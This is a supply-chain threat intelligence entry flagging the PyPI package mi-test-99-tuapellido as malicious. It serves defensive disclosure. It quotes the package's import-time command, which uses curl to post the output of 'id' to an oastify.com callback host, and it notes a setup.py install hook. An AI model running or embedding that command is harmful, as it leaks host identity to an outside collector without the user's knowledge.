Supply-chain threat intelligence
Risk score
92
Indexed incident for mi-test-99-tuapellido (pypi).
On every import, the package's top-level init.py runs os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)"). This unconditionally executes a shell pipeline that POSTs the output of the id command (current uid/gid/group membership) to a Burp Suite Collaborator (oastify.com) subdomain — an out-of-band callback service used to confirm remote code execution and exfiltrate data. The behavior fires on import mi_test_99 with no user gating, no relation to any advertised functionality, over plaintext HTTP. Package metadata is placeholder-shaped (name contains the literal Spanish placeholder tuapellido/'your-surname', author fields are Tu Nombre <tu@email.com>, pyproject comment reads CAMBIA ESTO por un nombre único), consistent with a dependency-confusion or namespace-squat proof-of-concept payload. Whether intended as a test or a live attack, any installer that imports this package leaks host identity to an attacker-controlled collector and demonstrates an arbitrary-shell-exec channel.
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
The package overrides the install command in setup.py to execute malicious code during installation.
The OpenSSF Package Analysis project identified 'mi-test-99-tuapellido' @ 99.9 (pypi) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
Affected versions
Indicators
Timeline